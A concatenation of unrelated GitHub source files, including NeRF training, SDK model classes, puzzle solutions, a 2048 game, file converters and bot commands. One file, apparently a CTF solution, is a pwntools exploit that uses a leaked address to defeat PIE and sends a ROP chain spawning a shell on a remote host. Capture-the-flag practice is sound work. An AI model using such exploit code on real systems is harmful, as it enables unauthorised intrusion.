        mock_wait_for_flink_job.assert_has_calls([call("ns", "log-user", "jobId1", False)])
| promotedai/openmetrics | pipeline/scripts/tests/deploy/test_deploy_updated_job.py | test_deploy_updated_job.py | py | 4,694 | python | en | code | 5 | github-code | 13 |
74080596176 | from pathlib import Path
from PIL import Image
import numpy as np
# Search for pyNeRFRenderCore in build/Debug/
import sys
# PyTurboNeRF is built into build/Debug next to this script; make it
# importable before the import below.
path_to_PyTurboNeRF = Path(__file__).parent.parent / "build" / "Debug"
print("Searching for TurboNeRF in", path_to_PyTurboNeRF)
sys.path.append(str(path_to_PyTurboNeRF))
import PyTurboNeRF as tn # type: ignore
# check if TurboNeRF is loaded
print("TurboNeRF loaded:", tn is not None)
# initialize all the things
manager = tn.NeRFManager()
renderer = tn.Renderer(pattern=tn.RenderPattern.LinearChunks)
# NOTE(review): LAYER_N is never referenced later in this script --
# confirm whether it is dead code.
LAYER_N = 3
def posix_to_win(path):
    """Convert a POSIX-style path on the /e/ mount into a Windows E:\\ path."""
    backslashed = Path(path).as_posix().replace("/", "\\")
    # Rewrite the leading "\e\" mount prefix as the E: drive letter.
    return backslashed.replace("\\e\\", "E:\\", 1)
# big-brain-mala-up-high/ double-antler-cones/ lumpy-short/ short-chandelier-on-spiny-bed/ tall-single-chandelier/ tiny-yellow-on-slab/
# crown-of-thorns/ lumpy-rocky-tall-parker-bg/ lumpy-solo/ red-urchin-thick-spines/ stalagmite-lumpy/ thick-wide-chandelier-on-rocks/ tiny-yellow-up-high/
#
# Scene names of the capture datasets to train, one NeRF per scene.
nerf_names = [
    "big-brain-mala-up-high",
    "double-antler-cones",
    "lumpy-short",
    "short-chandelier-on-spiny-bed",
    "tall-single-chandelier",
    "tiny-yellow-on-slab",
    "crown-of-thorns",
    "lumpy-rocky-tall-parker-bg",
    "lumpy-solo",
    "red-urchin-thick-spines",
    "stalagmite-lumpy",
    "thick-wide-chandelier-on-rocks",
    "tiny-yellow-up-high"
]
# alphabetize
nerf_names.sort()
# get CUDA_VISIBLE_DEVICES
import os
# NOTE(review): ``id`` shadows the builtin; left as-is in this doc pass.
id = os.environ["CUDA_VISIBLE_DEVICES"]
# split into 4 equal parts
# Each GPU (selected via CUDA_VISIBLE_DEVICES) handles its own quarter
# of the alphabetized scene list.
nerf_names = np.array_split(nerf_names, 4)[int(id)]
# prepend /e/nerfs/coral
nerf_names = [f"/e/nerfs/coral/{name}" for name in nerf_names]
# convert to windows path
nerf_names = [posix_to_win(name) for name in nerf_names]
# get index from args
index = int(sys.argv[1])
if index >= len(nerf_names):
    print(f"Index {index} is too high, there are only {len(nerf_names)} nerfs")
    exit()
base_path = nerf_names[index]
print(f"Working on {base_path}")
# create paths
# Output directories for periodic preview renders and model snapshots.
Path(f"{base_path}\\test").mkdir(parents=True, exist_ok=True)
Path(f"{base_path}\\snapshots").mkdir(parents=True, exist_ok=True)
dataset = tn.Dataset(f"{base_path}\\video.transforms.json")
dataset.load_transforms()
nerf = manager.create()
nerf.attach_dataset(dataset)
trainer = tn.Trainer(nerf)
# you can use any kind of render buffer you want, but if you want to get access to the rgba data as a np.array, you need to use the CPURenderBuffer
render_buf = tn.CPURenderBuffer()
render_buf.set_size(512, 512)
# Intrinsics for the 512x512 preview camera.
principal_point = (render_buf.width / 2, render_buf.height / 2)
focal_len = (500, 500)
shift = (0, 0)
# Just pull a random camera from the dataset
cam0 = dataset.cameras[0]
# Create a render camera with the resolution of our render buffer
render_cam = tn.Camera(
    (render_buf.width, render_buf.height),
    cam0.near,
    cam0.far,
    focal_len,
    principal_point,
    shift,
    cam0.transform,
    cam0.dist_params
)
trainer.setup_data(batch_size=2<<21)
def img_load_status(i, n):
    """Progress callback passed to trainer.load_images."""
    print("Loaded image {} of {}".format(i, n))
trainer.load_images(on_image_loaded=img_load_status)
# Main training loop: 15000 optimization steps with periodic occupancy
# grid updates and preview renders.
for i in range(15000):
    print(f"Training step {i}...")
    trainer.train_step()
    if i % 16 == 0 and i > 0:
        trainer.update_occupancy_grid(i)
    # render output image
    if i % 5000 == 0 and i > 0:
        request = tn.RenderRequest(
            render_cam,
            [nerf],
            render_buf,
            tn.RenderModifiers(),
            tn.RenderFlags.Final
        )
        renderer.submit(request)
        # save
        # Convert the float RGBA buffer to 8-bit and write a PNG preview.
        rgba = np.array(render_buf.get_rgba())
        rgba_uint8 = (rgba * 255).astype(np.uint8)
        img = Image.fromarray(rgba_uint8, mode="RGBA")
        img.save(f"{base_path}\\test\\render_{i:05d}.png")
    # save snapshot
    # if (i + 1) % 5000 == 0 and i > 0:
    #     tn.FileManager.save(nerf, f"{base_path}\\snapshots\\step-{nerf.training_step}.turbo")
# Final snapshot once training completes, then release resources.
tn.FileManager.save(nerf, f"{base_path}\\snapshots\\step-{nerf.training_step}.turbo")
trainer.teardown()
manager.destroy(nerf)
# it is recommended to call these methods at the end of your program
# render_buf.free()
# tn.teardown()
| JamesPerlman/TurboNeRF | examples/train-all.py | train-all.py | py | 4,235 | python | en | code | 296 | github-code | 13 |
17035737944 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlarmInfo(object):
    """Domain model for an alarm notification (alipay API payload).

    The seven fields are exposed through simple properties;
    ``to_alipay_dict``/``from_alipay_dict`` convert to and from the wire
    representation.  The previous copy-pasted per-field if/hasattr blocks
    are consolidated into a single loop over ``_FIELDS``.
    """

    # Wire-level field names, in payload order.
    _FIELDS = ('ad_code', 'content', 'level', 'out_id', 'time', 'title', 'type')

    def __init__(self):
        self._ad_code = None
        self._content = None
        self._level = None
        self._out_id = None
        self._time = None
        self._title = None
        self._type = None

    @property
    def ad_code(self):
        return self._ad_code

    @ad_code.setter
    def ad_code(self, value):
        self._ad_code = value

    @property
    def content(self):
        return self._content

    @content.setter
    def content(self, value):
        self._content = value

    @property
    def level(self):
        return self._level

    @level.setter
    def level(self, value):
        self._level = value

    @property
    def out_id(self):
        return self._out_id

    @out_id.setter
    def out_id(self, value):
        self._out_id = value

    @property
    def time(self):
        return self._time

    @time.setter
    def time(self, value):
        self._time = value

    @property
    def title(self):
        return self._title

    @title.setter
    def title(self, value):
        self._title = value

    @property
    def type(self):
        return self._type

    @type.setter
    def type(self, value):
        self._type = value

    def to_alipay_dict(self):
        """Serialize every truthy field; values that know how to convert
        themselves (``to_alipay_dict``) are serialized recursively."""
        params = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if not value:
                continue
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an AlarmInfo from a wire dict; None/empty input gives None."""
        if not d:
            return None
        o = AlarmInfo()
        for name in AlarmInfo._FIELDS:
            if name in d:
                setattr(o, name, d[name])
        return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/AlarmInfo.py | AlarmInfo.py | py | 3,389 | python | en | code | 241 | github-code | 13 |
16765879640 | import sys
def checkCol(col, board):
    """True when every entry in column ``col`` is marked (-1)."""
    return all(row[col] == -1 for row in board)
def checkRow(row, board):
    """True when every entry in row ``row`` is marked (-1)."""
    return all(value == -1 for value in board[row])
def checkBoard(num, board):
    """Mark every occurrence of ``num`` on ``board`` (in place) and return
    True when any marking completes a full row or column."""
    done = False
    for r, row in enumerate(board):
        for c in range(len(row)):
            if row[c] != num:
                continue
            row[c] = -1
            # Inlined checkRow/checkCol: a line is complete when every
            # cell in it is marked.
            full_row = all(v == -1 for v in row)
            full_col = all(other[c] == -1 for other in board)
            done = full_row or full_col or done
            if done:
                print("here!!", board, num)
    return done
def calcUnmarkedNums(board):
    """Sum of all unmarked (non -1) cells on the board."""
    return sum(value for row in board for value in row if value != -1)
def part1():
    """Print the drawn number and score of the first board to win."""
    with open("input.txt") as file:
        raw = [ln.strip() for ln in file.readlines() if ln.strip()]
    drawn = [int(num) for num in raw[0].split(",")]
    # Boards are 5 consecutive non-blank lines each, after the draw line.
    boards = [
        [[int(num) for num in raw[i + j].split()] for j in range(5)]
        for i in range(1, len(raw), 5)
    ]
    total = 0
    for d in drawn:
        # checkBoard marks ``d`` on each board; stop at the first winner.
        winner = next((b for b in boards if checkBoard(d, b)), None)
        if winner is not None:
            total = calcUnmarkedNums(winner)
            break
    print(d, total)
    print(d * total)
def part2():
    """Find the board that wins last and print its score."""
    with open("input.txt") as file:
        raw = [ln.strip() for ln in file.readlines() if ln.strip()]
    drawn = [int(num) for num in raw[0].split(",")]
    boards = [
        [[int(num) for num in raw[i + j].split()] for j in range(5)]
        for i in range(1, len(raw), 5)
    ]
    finished = [False] * len(boards)
    finish_order = []
    for d in drawn:
        for idx, b in enumerate(boards):
            # checkBoard must run for every board (it marks the number);
            # only record a win the first time a board completes.
            if checkBoard(d, b) and not finished[idx]:
                finish_order.append((d, [row[:] for row in b]))
                finished[idx] = True
    last_num, last_board = finish_order.pop()
    print(last_num, calcUnmarkedNums(last_board))
    print(last_num * calcUnmarkedNums(last_board))


part2()
class Solution:
    """LeetCode 35 -- Search Insert Position."""

    def searchInsert(self, nums: list[int], target: int) -> int:
        """Return the index of ``target`` in the sorted list ``nums``, or
        the index where it would be inserted to keep the list sorted.

        Uses binary search (O(log n)) instead of the previous linear
        scan, which also raised IndexError on an empty ``nums``.
        """
        from bisect import bisect_left
        return bisect_left(nums, target)
if __name__ == '__main__':
    # Ad-hoc smoke test: 8 belongs between 7 and 9 -> index 3.
    nums = [3,5,7,9,10]
    target = 8
    result = Solution().searchInsert(nums, target)
    print(result)
| N1kMA/Leetcode | search_insert_position.py | search_insert_position.py | py | 502 | python | en | code | 0 | github-code | 13 |
15549483355 | from pwn import *
from pwn import p64,u64
# Toggle local debugging (spawn the binary locally instead of connecting).
debug = 0
gdb_is = 0
# context(arch='i386',os = 'linux')
context(arch='amd64',os = 'linux', log_level='DEBUG')
if debug:
    context.terminal = ['/mnt/c/Users/sagiriking/AppData/Local/Microsoft/WindowsApps/wt.exe','nt','Ubuntu','-c']
    r = process("./pwn")
else:
    host = "192.168.0.111:57201"
    r = connect(host.split(':')[0],host.split(':')[1])# remote connection
    gdb_is =0
if gdb_is:
    # r = gdb.debug("./pwn",'b ')
    # gdb.attach(r,'b ')
    # gdb.attach(r)
    pause()
elf = ELF('./pwn')
# The service leaks vuln()'s runtime address; use it to compute the PIE
# slide (``offset``) and rebase the ELF symbols.
r.recvuntil(b"Vuln's address is:")
vuln_addr = int(r.recvuntil(b'\n')[2:-1].decode(),16)
offset = vuln_addr - elf.sym['vuln']
elf.address = offset
# ROP pieces, all rebased by the PIE slide.  ``binsh`` presumably points
# at a "/bin/sh" string in the binary -- confirm against the target.
pop_rdi = 0x001323 + offset
binsh = 0x000004010 + offset
ret = 0x000000101a+ offset
# 80 bytes of padding, 8 bytes presumably overwriting the saved RBP
# ("junkjunk"), then system(binsh) with an extra ret for stack alignment.
paylod = b'A'*80 + b'junkjunk' + p64(pop_rdi) + p64(binsh) + p64(ret)+ p64(elf.sym['system'])
r.send(paylod)
r.interactive()
| Sagiring/Sagiring_pwn | MoeCTF2023/PIE_enabled/pwn_exp.py | pwn_exp.py | py | 937 | python | en | code | 1 | github-code | 13 |
41398002620 | import json
import glob
def create_category_json(path: str = "questions/questions.json") -> None:
    """
    Group all car-licence ("«В»") questions by category and dump the
    mapping ``{category: [question, ...]}`` as JSON into *path*.
    """
    categories: dict = {}
    # glob.glob1() was an undocumented private helper (removed from recent
    # CPython releases); count the part files with the public glob API.
    question_part_count: int = len(glob.glob("questions/part*"))
    # go through the question parts (the separate manually-incremented
    # counter duplicated the loop index and is gone)
    for part_index in range(question_part_count):
        with open(f"questions/part_{part_index}.json", 'r') as part_file:
            cur_part = json.loads(part_file.read())["result"]["records"]
        for question in cur_part:
            # removing all questions that aren't for cars
            if r"«В»" in question["description4"]:
                categories.setdefault(question["category"], []).append(question)
    # dumping dict in file
    with open(path, 'w') as categoriesFile:
        json.dump(categories, categoriesFile, ensure_ascii=False)
def decrease_repeat_dict(repeat: dict, category_qustions_ids: dict):
    """Decrement the repeat counter of every question in the category.

    Returns the id (int) of a question whose counter ran out -- that
    question is removed from ``repeat`` -- or None when nothing is due.
    """
    due_id = None
    for key, remaining in repeat.items():
        if int(key) not in category_qustions_ids:
            continue
        repeat[key] = remaining - 1
        if repeat[key] < 1:
            due_id = int(key)
    # Remove the due question only after the iteration is finished.
    if due_id is not None:
        repeat.pop(str(due_id))
    print(repeat)
    return due_id
| Bnux256/TheoryHelper | lib/count_category.py | count_category.py | py | 1,783 | python | en | code | 3 | github-code | 13 |
8004194558 | """
Clone of 2048 game.
http://www.codeskulptor.org/#user40_dSvByRSsOh3253F.py
"""
import poc_2048_gui
import random
# Directions, DO NOT MODIFY
UP = 1
DOWN = 2
LEFT = 3
RIGHT = 4
# Offsets for computing tile indices in each direction.
# DO NOT MODIFY this dictionary.
OFFSETS = {UP: (1, 0),
DOWN: (-1, 0),
LEFT: (0, 1),
RIGHT: (0, -1)}
def mov0end(lst):
    """
    Function that moves zeros to the end of a list.

    Keeps the relative order of the non-zero entries.  Rewritten from an
    insert()-based loop (O(n^2)) to a single O(n) pass.
    """
    nonzero = [number for number in lst if number != 0]
    return nonzero + [0] * (len(lst) - len(nonzero))
def merge(line):
    """
    Merge a single row or column toward the front, 2048-style.

    Equal adjacent tiles combine once per move; zeros end up at the back.
    (The zero-compaction helper is inlined here as two comprehensions.)
    """
    tiles = [value for value in line if value != 0] + [0] * line.count(0)
    for idx in range(len(tiles) - 1):
        if tiles[idx] != 0 and tiles[idx] == tiles[idx + 1]:
            tiles[idx] *= 2
            tiles[idx + 1] = 0
    merged = [value for value in tiles if value != 0]
    return merged + [0] * (len(tiles) - len(merged))
class TwentyFortyEight:
    """
    Class to run the game logic for a 2048 clone.
    """
    def __init__(self, grid_height, grid_width):
        # Grid dimensions and the grid itself (list of row lists).
        self.grid_height = grid_height
        self.grid_width = grid_width
        self.newgrid = []
        self.reset()
        # indD maps each direction to the list of starting (row, col)
        # tiles along the edge from which a move in that direction begins.
        self.indD = {}
        self.indD[UP] = [(0, col) for col in range(self.grid_width)]
        self.indD[LEFT] = [(row, 0) for row in range(self.grid_height)]
        self.indD[DOWN] = [(self.grid_height - 1, col)for col in range(self.grid_width)]
        self.indD[RIGHT] = [(row, self.grid_width - 1)for row in range(self.grid_height)]
    def reset(self):
        """
        Reset the game so the grid is empty except for two
        initial tiles.
        """
        self.newgrid = [[0 for col in range(self.grid_width)] for row in range(self.grid_height)]
        self.new_tile()
        self.new_tile()
    def __str__(self):
        """
        Return a string representation of the grid for debugging.
        """
        # NOTE(review): debug stub -- always returns the empty string.
        return ""
    def get_grid_height(self):
        """
        Get the height of the board.
        """
        return self.grid_height
    def get_grid_width(self):
        """
        Get the width of the board.
        """
        return self.grid_width
    def move(self, direction):
        """
        Move all tiles in the given direction and add
        a new tile if any tiles moved.
        """
        shift = False
        row = 0
        col = 0
        # ``atd`` is a perpendicular direction; its start list has exactly
        # as many entries as there are tiles along one traversal line, so
        # only its *length* is used below.
        if direction < 3:
            atd = direction + 2
        else:
            atd = direction - 2
        temp = []
        for item in range(len(self.indD[direction])):
            # Collect one line of tiles, walking from the starting edge
            # along the direction's (row, col) offset.
            for count in range(len(self.indD[atd])):
                row = self.indD[direction][item][0] + count * OFFSETS[direction][0]
                col = self.indD[direction][item][1] + count * OFFSETS[direction][1]
                temp.append(self.get_tile(row, col))
            temp = merge(temp)
            # Write the merged line back; remember whether anything moved.
            for count in range(len(temp)):
                row = self.indD[direction][item][0] + count * OFFSETS[direction][0]
                col = self.indD[direction][item][1] + count * OFFSETS[direction][1]
                #print 'row:', row, 'col:', col
                if self.newgrid[row][col] != temp[count]:
                    shift = True
                self.set_tile(row, col, temp[count])
            temp = []
        # Only spawn a new tile when the move actually changed the grid.
        if shift == True:
            self.new_tile()
    def new_tile(self):
        """
        Create a new tile in a randomly selected empty
        square. The tile should be 2 90% of the time and
        4 10% of the time.
        """
        col = 0
        row = 0
        # Keep sampling random cells until an empty one is found.
        # NOTE(review): if the grid has no empty square this loop never
        # terminates -- confirm callers guarantee a free cell.
        while row < self.grid_height and col < self.grid_width:
            row = random.randrange(0, self.grid_height)
            col = random.randrange(0, self.grid_width)
            #print 'row:', row, 'col:', col
            if self.newgrid[row][col] == 0:
                break
        self.newgrid[row][col] = random.choice([2,2,2,2,2,2,2,2,2,4])
    def set_tile(self, row, col, value):
        """
        Set the tile at position row, col to have the given value.
        """
        self.newgrid[row][col] = value
    def get_tile(self, row, col):
        """
        Return the value of the tile at position row, col.
        """
        return self.newgrid[row][col]
# Launch the game GUI on a 5x6 board (poc_2048_gui is imported elsewhere,
# not defined in this file).
poc_2048_gui.run_gui(TwentyFortyEight(5, 6))
| chickenoverrice/python_game | python_game2048.py | python_game2048.py | py | 4,444 | python | en | code | 0 | github-code | 13 |
38227794476 | #!/usr/bin/env/python3
# -*- coding: utf-8 -*-
# A minimal `tee`: copies stdin to the given file (truncate by default,
# append with -a) and echoes the data to stdout.
__author__ = 'drawnkid@gmail.com'
import sys
import os
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-a", "--append", dest="append", action="store_true",
                  default=False, help="append the string")
options, args = parser.parse_args()
# Exactly one target file is required and it must be an existing regular file.
if not len(args) == 1:
    print("One file needed.", file=sys.stderr)
    sys.exit()
if not os.path.exists(args[0]):
    print(args[0], ": No such file or directory", file=sys.stderr)
    sys.exit()
if not os.path.isfile(args[0]):
    # BUG FIX: the original wrote file=sys.stderr() -- calling the stream
    # object raised TypeError instead of printing the error.
    print(args[0], "is not a file.", file=sys.stderr)
    sys.exit()
# The append/truncate branches were identical except for the open mode;
# a context manager also guarantees the file is closed.
mode = 'a' if options.append else 'w'
with open(args[0], mode) as fd:
    tmpInput = sys.stdin.read()
    fd.write(tmpInput)
print(tmpInput)
| BaliStarDUT/hello-world | code/python/IO/tee_2.py | tee_2.py | py | 915 | python | en | code | 4 | github-code | 13 |
19158535215 | # Given a knapsack with maximum capacity W, and a set S consisting of n items
# Each item i has some weight wi and benefit value bi (all wi, bi and W are integer values)
# Problem: How to pack the knapsack to achieve maximum total value of packed items?
# Example:
# values = [60, 100, 120]
# weights = [10, 20, 30]
# W = 50
# weight = 10, value = 60
# weight = 20, value = 100
# weight = 30, value = 120
# weight = (20+10), value = (100+60)
# weight = (30+10), value = (120+60)
# weight = (30+20), value = (120+100) -> solution
# http://cse.unl.edu/~goddard/Courses/CSCE310J/Lectures/Lecture8-DynamicProgramming.pdf
# https://www.geeksforgeeks.org/0-1-knapsack-problem-dp-10/
def knapSack(W, wt, val, n):
    """Solve the 0/1 knapsack problem.

    Args:
        W: knapsack capacity (non-negative int).
        wt: item weights.
        val: item values (parallel to wt).
        n: number of items to consider (the first n entries of wt/val).

    Returns:
        The maximum total value of items that fit within capacity W.

    Uses the classic DP over capacities but keeps a single row
    (O(W) memory instead of the original O(n*W) table).  Iterating
    capacities downward ensures each item is used at most once.
    """
    best = [0] * (W + 1)
    for i in range(n):
        for w in range(W, wt[i] - 1, -1):
            best[w] = max(best[w], val[i] + best[w - wt[i]])
    return best[W]
# Example from the header comment: capacity 50 with items (10,60), (20,100),
# (30,120); the optimum is 220 (take the 20- and 30-weight items).
val = [60, 100, 120]
wt = [10, 20, 30]
W = 50
n = len(val)
print(knapSack(W, wt, val, n)) | phamtamlinh/coding-challenges | basic/dynamic-programming/0-1-knapsack-problem.py | 0-1-knapsack-problem.py | py | 1,092 | python | en | code | 0 | github-code | 13 |
30140726420 | import argparse
from data_converter import utils
def convert(input_file, to_format):
    """Convert *input_file* into the *to_format* file format.

    Raises:
        FileNotFoundError & UserWarning: from `utils._check_input_file`.
        ValueError: if *to_format* is not a supported extension.

    Returns:
        str: Absolute file path of the written output file.
    """
    if not utils._is_file_ext_supported(to_format):
        raise ValueError("File extension is not supported: {ext}".format(ext=to_format))

    source_path = utils._check_input_file(input_file, to_format)
    source_ext = utils._get_file_ext(source_path)

    # Parse with the reader registered for the source extension...
    parsed_data = utils.converters[source_ext].read_file(source_path)

    # ...then serialize with the writer registered for the target extension.
    target_path = utils.rreplace(source_path, source_ext, to_format)
    utils.converters[to_format].write_file(parsed_data, target_path)
    return target_path
def cli():
    """Command line entry point: convert one data file into another format.

    Notes:
        Avoids pathlib to stay compatible with older Python versions.
    """
    parser = argparse.ArgumentParser(description='Convert data files')
    parser.add_argument('-t', '--to', help='Output format', required=True)
    parser.add_argument('input_file', help='File to convert')
    cli_args = parser.parse_args()

    try:
        print(convert(cli_args.input_file, cli_args.to))
    except (FileNotFoundError, UserWarning, ValueError) as err:
        # argparse prints the message to stderr and exits non-zero.
        parser.error(str(err))
| xtream1101/data-converter | data_converter/__init__.py | __init__.py | py | 1,424 | python | en | code | 2 | github-code | 13 |
12089083303 | # 练习2:为sum_data,增加打印函数执行时间的功能.
# 函数执行时间公式: 执行后时间 - 执行前时间
import time
# 装饰器函数
def exeture_time(func):
    """Decorator: print the wall-clock run time of each call to *func*.

    The wrapped function's return value is passed through unchanged.
    """
    from functools import wraps

    @wraps(func)  # preserve the wrapped function's name/docstring
    def wrapper(*args, **kwargs):
        start_time = time.time()
        result = func(*args, **kwargs)
        elapsed = time.time() - start_time
        print('原函数执行的时间:', elapsed)
        return result
    return wrapper
@exeture_time
def sum_data(n):  # timed implementation using a for loop
    """Return the sum of the integers 0..n-1 (for-loop variant)."""
    total = 0
    for value in range(n):
        total = total + value
    return total
@exeture_time
def sum_data1(n):  # timed implementation using a while loop
    """Return the sum of the integers 0..n-1 (while-loop variant)."""
    total = 0
    counter = 0
    while counter < n:
        total += counter
        counter += 1
    return total
# Exercise both timed implementations on a small and a large input so the
# decorator's timing output can be compared.
print(sum_data(10))
print(sum_data1(10))
print(sum_data(1000000))
print(sum_data1(1000000)) | 15149295552/Code | Month01/Day15/exercise03.py | exercise03.py | py | 812 | python | zh | code | 1 | github-code | 13 |
36265574162 | def close(session, models=None):
    '''
    Close models.
    Parameters
    ----------
    models : list of models
        These models and any submodels are closed.  If models is none all models are closed.
    '''
    m = session.models
    if models is None:
        models = m.list()
    # Avoid closing grouping models if not all child models are closed.
    # This is so that "close ~#1.1" does not close grouping model #1.
    # have_all_child_models() keeps only models whose whole subtree was listed.
    hc = have_all_child_models(models)
    cmodels = [cm for cm in models if cm in hc]
    m.close(cmodels)
def have_all_child_models(models):
    '''
    Return a set containing those models in the given models that have all
    child and descendant models in the given models.
    '''
    complete = set()
    candidates = set(models)
    for model in models:
        _contains_model_tree(model, candidates, complete)
    return complete
def _contains_model_tree(m, mset, contains):
if not m in mset:
return
cmodels = m.child_models()
for c in cmodels:
_contains_model_tree(c, mset, contains)
for c in cmodels:
if not c in contains:
return
contains.add(m)
def close_session(session):
    # Clear all session contents back to the initial, empty state.
    session.reset()
def register_command(logger):
    """Register the 'close' and 'close session' commands with ChimeraX."""
    from chimerax.core.commands import CmdDesc, register, ModelsArg
    close_desc = CmdDesc(optional=[('models', ModelsArg)],
                         synopsis='close models')
    register('close', close_desc, close, logger=logger)
    session_desc = CmdDesc(synopsis="clear session contents")
    register('close session', session_desc, close_session, logger=logger)
| HamineOliveira/ChimeraX | src/bundles/std_commands/src/close.py | close.py | py | 1,549 | python | en | code | null | github-code | 13 |
20032798567 | #!/usr/bin/python3
"""
Minimum Operations
"""
def minOperations(n):
    """
    Return the fewest Copy All / Paste operations needed to end up with
    exactly n 'H' characters, starting from a single 'H'.

    Resolution method: the answer is the sum of n's prime factors (with
    multiplicity) -- reaching a prime-sized block costs that prime many
    operations, and factors compose multiplicatively.  Returns 0 for n <= 1.
    """
    if n <= 1:
        return 0
    ops = 0
    factor = 2
    # Trial division up to sqrt(n); the original iterated every i up to n
    # and used float division (n = n / i), risking precision loss.
    while factor * factor <= n:
        while n % factor == 0:
            ops += factor
            n //= factor
        factor += 1
    if n > 1:
        # Whatever remains is itself a prime factor.
        ops += n
    return ops
| dacastanogo/holbertonschool-interview | 0x03-minimum_operations/0-minoperations.py | 0-minoperations.py | py | 643 | python | en | code | 0 | github-code | 13 |
31190579625 | from pyrogram import filters
from pyrogram.types import Message
from strings import get_command
from AasthaMusicBot import app
from AasthaMusicBot.misc import SUDOERS
from AasthaMusicBot.utils.database import add_off, add_on
from AasthaMusicBot.utils.decorators.language import language
# Commands
# Command trigger string(s) resolved through the strings module's get_command.
MAINTENANCE_COMMAND = get_command("MAINTENANCE_COMMAND")
@app.on_message(filters.command(MAINTENANCE_COMMAND) & SUDOERS)
@language
async def maintenance(client, message: Message, _):
    """Sudo-only command: enable or disable global maintenance mode.

    Expects exactly one argument ("enable" or "disable"); replies with the
    localized usage string (_ is the language dict) otherwise.
    """
    usage = _["maint_1"]
    if len(message.command) != 2:
        return await message.reply_text(usage)
    # NOTE: removed a dead `message.chat.id` expression statement that had
    # no effect.
    state = message.text.split(None, 1)[1].strip().lower()
    # The maintenance flag is stored against a fixed pseudo-user id (1).
    user_id = 1
    if state == "enable":
        await add_on(user_id)
        await message.reply_text(_["maint_2"])
    elif state == "disable":
        await add_off(user_id)
        await message.reply_text(_["maint_3"])
    else:
        await message.reply_text(usage)
| Ozlembener/AasthaTGMusicBot | AasthaMusicBot/plugins/sudo/maintenance.py | maintenance.py | py | 988 | python | en | code | 1 | github-code | 13 |
21414347697 | from unittest import TextTestResult
import subprocess
import yaml
class TextTestResultWithSuccesses(TextTestResult):
    """
    TextTestResult subclass that additionally records each passing test
    in `self.successes` (mirroring the built-in failures/errors lists).
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.successes = []
    def addSuccess(self, test):
        super().addSuccess(test)
        self.successes.append(test)
def execute_command(command):
    """Run *command* through /bin/bash and capture its outcome.

    WARNING: the command string is passed to a shell (shell=True), so it
    must never be built from untrusted input.

    Returns:
        dict with "exit-code" (int) plus "output" and "error"
        (UTF-8 decoded, stripped strings).
    """
    completed = subprocess.run(command, shell=True, executable="/bin/bash",
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    return {
        "exit-code": completed.returncode,
        "output": completed.stdout.decode("utf-8").strip(),
        "error": completed.stderr.decode("utf-8").strip(),
    }
def parse_yaml_file(path):
    """Load and return the parsed contents of the YAML file at *path*.

    NOTE: yaml.full_load can construct non-trivial Python objects; do not
    point this at untrusted files (yaml.safe_load would be stricter).
    """
    with open(path, "r") as stream:
        return yaml.full_load(stream)
def nested_get(dictionary, *keys):
    """Safely fetch a nested value, e.g. nested_get(d, "a", "b") -> d["a"]["b"].

    Returns None as soon as any key is missing or an intermediate value is
    not indexable.  (The original only caught KeyError and then kept
    indexing into None, raising TypeError on the next key.)
    """
    value = dictionary
    for key in keys:
        try:
            value = value[key]
        except (KeyError, IndexError, TypeError):
            return None
    return value
| AlassaneNdiaye/test-containers | test_containers/utils.py | utils.py | py | 1,267 | python | en | code | 0 | github-code | 13 |
32954770392 | import base64
import importlib
import io
from datetime import datetime
from typing import Dict, TypedDict
import cv2
import numpy
from cv2 import Mat, imencode, imread
class Images(TypedDict):
    # Three cached states of one image (populated by ImageManager.get_image):
    original: Mat  # the image as loaded from disk, never modified
    before: Mat  # last committed state (before the pending edit)
    after: Mat  # working state (after the pending edit)
# Maps an image file path to its cached Images states.
Paths = Dict[str, Images]
class ImageManager:
    """Caches editing state for images keyed by file path and applies
    adjustment modules from the `adjustments` package to them.
    """

    # Annotation only: the cache is created per instance in __init__.
    # (The original bound a class-level dict here, which every
    # ImageManager instance would have shared.)
    images: Paths

    def __init__(self):
        self.images = dict()

    def load_image(self, path: str):
        """Load (and cache) the image at `path`; return the original Mat."""
        images = self.get_image(path)
        return images.get('original')

    def process_image(self, name: str, path: str, data: any = None):
        """Apply the adjustment module `adjustments.<name>` to the cached
        state for `path` and return the resulting 'after' image.

        `data`, when given, is forwarded to the module's main().
        """
        print('processing: ' + name)
        started = datetime.now()
        images = self.get_image(path)
        module = importlib.import_module('adjustments.' + name)
        if data is None:
            module.main(images)
        else:
            module.main(images, data)
        image = images.get('after')
        delta = datetime.now() - started
        print('finished: ' + name + ' in ' + str(delta.total_seconds()) + ' seconds')
        return image

    def get_image(self, path: str):
        """Return the cached state for `path`, loading it on first access."""
        image_data = self.images.get(path, None)
        if image_data is None:
            image_data = self.images[path] = dict()
            # The original image without changes
            image_data['original'] = imread(path)
            # The current state of the image before changes
            image_data['before'] = imread(path)
            # The state of the image after changes
            image_data['after'] = imread(path)
        return image_data

    def apply_image(self, path: str):
        """Commit the pending changes: 'before' becomes a copy of 'after'."""
        images = self.get_image(path)
        images['before'] = images.get('after').copy()
        return images['before']

    def cancel_image(self, path: str):
        """Return the last committed ('before') image.

        NOTE(review): 'after' is left untouched here; callers appear to
        overwrite it on the next adjustment -- confirm.
        """
        images = self.get_image(path)
        return images['before']

    def to_image(self, image: Mat, ext='.jpg', quality=100) -> numpy.ndarray:
        """Encode `image` with OpenCV; return the encoded byte buffer."""
        retval, buffer = imencode(ext, image, [
            int(cv2.IMWRITE_JPEG_QUALITY), quality,
            int(cv2.IMWRITE_PNG_COMPRESSION), max(int(quality / 100 * 10), 1),
            int(cv2.IMWRITE_WEBP_QUALITY), quality
        ])
        return buffer

    def get_quadrants(self, image: Mat):
        """Split `image` into four encoded quadrants, each tagged with the
        (x, y) of its top-left corner in the full image."""
        height, width, other = image.shape
        half_h = int(height / 2)
        half_w = int(width / 2)
        # Slices are [rows, columns].
        top_left = image[0:half_h, 0:half_w].copy()
        top_right = image[0:half_h, half_w:width].copy()
        bottom_left = image[half_h:height, 0:half_w].copy()
        bottom_right = image[half_h:height, half_w:width].copy()
        return [
            {'x': 0, 'y': 0, 'i': self.to_image(top_left)},
            {'x': half_w, 'y': 0, 'i': self.to_image(top_right)},
